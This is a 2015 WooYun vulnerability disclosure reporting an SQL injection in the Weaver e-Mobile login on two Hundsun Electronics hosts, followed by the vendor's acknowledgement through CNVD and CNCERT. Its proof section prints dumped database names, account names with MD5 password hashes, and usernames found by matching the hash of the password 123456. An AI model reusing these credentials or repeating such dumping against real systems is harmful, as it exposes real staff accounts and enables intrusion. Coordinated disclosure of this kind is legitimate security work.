当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0126726

漏洞标题:恒生电子股份有限公司采用不靠谱系统存在SQL注射漏洞(影响用户密码等信息)

相关厂商:恒生电子股份有限公司

漏洞作者: 路人甲

提交时间:2015-07-14 15:38

修复时间:2015-08-31 16:38

公开时间:2015-08-31 16:38

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:10

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-07-14: 细节已通知厂商并且等待厂商处理中
2015-07-17: 厂商已经确认,细节仅向厂商公开
2015-07-27: 细节向核心白帽子及相关领域专家公开
2015-08-06: 细节向普通白帽子公开
2015-08-16: 细节向实习白帽子公开
2015-08-31: 细节向公众公开

简要描述:

最近看新闻知道了恒生电子还有Homs,惊呆了,赶紧看看……

详细说明:

http://m.hundsun.com
http://synergy.hundsun.com:89


这两个站使用了泛微oa的e-Mobile系统,这个系统登录处存在一处SQL注射漏洞。

a.png


b.png


一个经典注射。

available databases [21]:
[*] APEX_030200
[*] APPQOSSYS
[*] CTXSYS
[*] DBSNMP
[*] EXFSYS
[*] FLOWS_FILES
[*] MDSYS
[*] OLAPSYS
[*] ORDDATA
[*] ORDSYS
[*] OUTLN
[*] OWBSYS
[*] SCOTT
[*] SYNERGY
[*] SYNERGYQM
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TEST
[*] WMSYS
[*] XDB


当前库“ SYNERGY”,“协同办公”?

漏洞证明:

经典注射在跑起来的时候还是挺费劲的

1.png


2.png


select LONGONNAME,LOGONPASS,ISMASTER from YH_SYSUSER; [5]:
[*] 01573, ecd83d7e77017d0596ad05315eb2d086, 1
[*] 02107, 0f0e1f751500e7a680388b05639d1624,
[*] 02108, 0f0e1f751500e7a680388b05639d1624,
[*] 02106, 2c466cd87bdd89f96fd9bfcb41632aed, 1
[*] 02111, 91ce6f03d53eb69ce3a06840ee323269, 1


在随便找几个密码123456的用户

select LONGONNAME from YH_SYSUSER where LOGONPASS = 'e10adc3949ba59abbe56e057f20f883e'; [7]:
[*] 03152
[*] wangkai
[*] wuyd
[*] fangjun
[*] 03452
[*] zhengwb
[*] yuxy


不过最后发现账号都无法登陆,啥情况?

修复方案:

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-07-17 16:37

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT向证券业信息化主管部门通报,由其后续协调网站管理单位处置。

最新状态:

暂无